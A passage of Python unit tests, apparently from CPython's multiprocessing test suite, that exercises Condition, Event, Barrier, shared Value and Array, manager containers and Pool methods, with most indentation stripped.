self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# further notify calls have no effect; everyone is already awake
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda: state.value == 4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda: state.value == 0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda: state.value == 4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily due to API shear; this does not
# work with threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
# Removed: threading.Event.wait() will return the value of the __flag
# instead of None; API shear with the semaphore-backed mp.Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
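# A minimal sketch of the Event timeout semantics the test above relies on
# (illustrative only, not exercised by the runner): wait() returns False on
# timeout while the event is unset, and True immediately once it is set.
def _sketch_event_wait():
    import multiprocessing
    event = multiprocessing.Event()
    assert event.wait(0.0) is False   # unset: times out straight away
    event.set()
    assert event.wait() is True       # set: returns True without blocking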
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
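# Usage sketch for _DummyList (illustrative only): the barrier tests only
# ever call append() to bump the shared counter and len() to read it back,
# and the __getstate__/__setstate__ pair keeps the counter usable after it
# has been pickled into a child process.
def _sketch_dummy_list_counter():
    counter = _DummyList()
    counter.append(True)
    counter.append(True)
    assert len(counter) == 2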
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
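# Note: the codes_values typecodes in _TestValue follow the struct/array
# convention ('i' signed int, 'd' double, 'h' short, 'q' long long,
# 'c' single byte character), each paired with an initial value and the
# value the child process writes back.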
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
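# Behaviour note: exception_throwing_generator(total, -1) raises
# SayWhenError before yielding anything, while a non-negative `when`
# yields 0 .. when-1 and then raises on reaching index `when`. The pool
# tests below use both shapes to probe error handling at the start of,
# and partway through, an input iterable.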
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
